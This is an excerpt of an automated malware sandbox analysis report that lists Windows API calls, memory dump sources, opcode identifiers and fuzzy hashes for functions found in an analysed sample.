                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02491858
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02491890
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy
                                                              • String ID:
                                                              • API String ID: 3722407311-0
                                                              • Opcode ID: 7ae04f7c6e936abb9121da055da54f732691e094f676fb8c019d3dd63920e58b
                                                              • Instruction ID: 24e8c23124e757e9e5cb1ad489bd846639bad7103a5dd256910016faf65014a0
                                                              • Opcode Fuzzy Hash: 7ae04f7c6e936abb9121da055da54f732691e094f676fb8c019d3dd63920e58b
                                                              • Instruction Fuzzy Hash: F621B1B4601B039BDB34DF6AC998A17BBE6AF44744B144A1E989AC7B40DB74E400DFA0
                                                              APIs
                                                                • Part of subcall function 024975A7: lstrlen.KERNEL32(------,02475D82), ref: 024975B2
                                                                • Part of subcall function 024975A7: lstrcpy.KERNEL32(00000000), ref: 024975D6
                                                                • Part of subcall function 024975A7: lstrcat.KERNEL32(?,------), ref: 024975E0
                                                                • Part of subcall function 02497517: lstrcpy.KERNEL32(00000000), ref: 02497545
                                                                • Part of subcall function 02494077: lstrcpy.KERNEL32(00000000,0042D01C), ref: 024940AC
                                                                • Part of subcall function 02494077: lstrcpy.KERNEL32(00000000,00638AA4), ref: 024940D6
                                                                • Part of subcall function 02494077: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,02471495,?,0000001A), ref: 024940E0
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248C5B2
                                                              • lstrcat.KERNEL32(00000000), ref: 0248C5BC
                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0248C5EA
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248C629
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$lstrcat$SystemTimelstrlen
                                                              • String ID:
                                                              • API String ID: 3486790982-0
                                                              • Opcode ID: 51ee759836b56bbb9668dab7b2b627ac7de2a18087f825893ee7e7dc6d6dc0d3
                                                              • Instruction ID: b79be7571857a1a20c93ee3ade479e0838a49a3c7ba9a526cec201347e2802aa
                                                              • Opcode Fuzzy Hash: 51ee759836b56bbb9668dab7b2b627ac7de2a18087f825893ee7e7dc6d6dc0d3
                                                              • Instruction Fuzzy Hash: 95215770E20255DBCF24EFA5CC88AAEBBF2AF44308F14446BD811AB251DB74D941DFA0
                                                              APIs
                                                              • memcpy.MSVCRT(?,?,00000040), ref: 00406E40
                                                              • memcpy.MSVCRT(?,00005A4D,000000F8), ref: 00406E7C
                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 00406EB4
                                                              • HeapAlloc.KERNEL32(00000000), ref: 00406EBB
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Heapmemcpy$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1643994569-0
                                                              • Opcode ID: 0f7b886846e76426d6cbee1e2efefd49dca9b7f6cc258be776eaadaa1a2d8544
                                                              • Instruction ID: 021ca828da5bfa0a796bb6e6c33eee2a11837a2b1fb4363adf8c912b1a52eb88
                                                              • Opcode Fuzzy Hash: 0f7b886846e76426d6cbee1e2efefd49dca9b7f6cc258be776eaadaa1a2d8544
                                                              • Instruction Fuzzy Hash: 9A218CB06007029BEB248B21DC84BBB73E8EB40704F44447DEA47DB684EBB8E951CB95
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000), ref: 0040152D
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 0040154F
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 00401571
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 00401593
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy
                                                              • String ID:
                                                              • API String ID: 3722407311-0
                                                              • Opcode ID: 1e4db7d30871f81d580a612b99273a05910c7c6a33be4731b3f5a86597217395
                                                              • Instruction ID: 156e9cd4061fd8f5e73776b1d1d3add2ecf4c06161da7b3eeeca5abdbe74678b
                                                              • Opcode Fuzzy Hash: 1e4db7d30871f81d580a612b99273a05910c7c6a33be4731b3f5a86597217395
                                                              • Instruction Fuzzy Hash: 86111275A01B02ABDB14AF36D95C927B7F8BF44305304463EA457E7B90EB78E800CB94
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000), ref: 02471794
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 024717B6
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 024717D8
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 024717FA
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy
                                                              • String ID:
                                                              • API String ID: 3722407311-0
                                                              • Opcode ID: 4ad754671c24d071af27ddad61fabe380e7e2885a874112eec80ea100ea8e3f1
                                                              • Instruction ID: 11f6747c451c644dde8b929397a9c56f0b277147c0227c4b6b965823df097052
                                                              • Opcode Fuzzy Hash: 4ad754671c24d071af27ddad61fabe380e7e2885a874112eec80ea100ea8e3f1
                                                              • Instruction Fuzzy Hash: 7511F174A11B029BD7349F36D858967B7F9FF446457044A2E98AED3B40EB74E401CFA0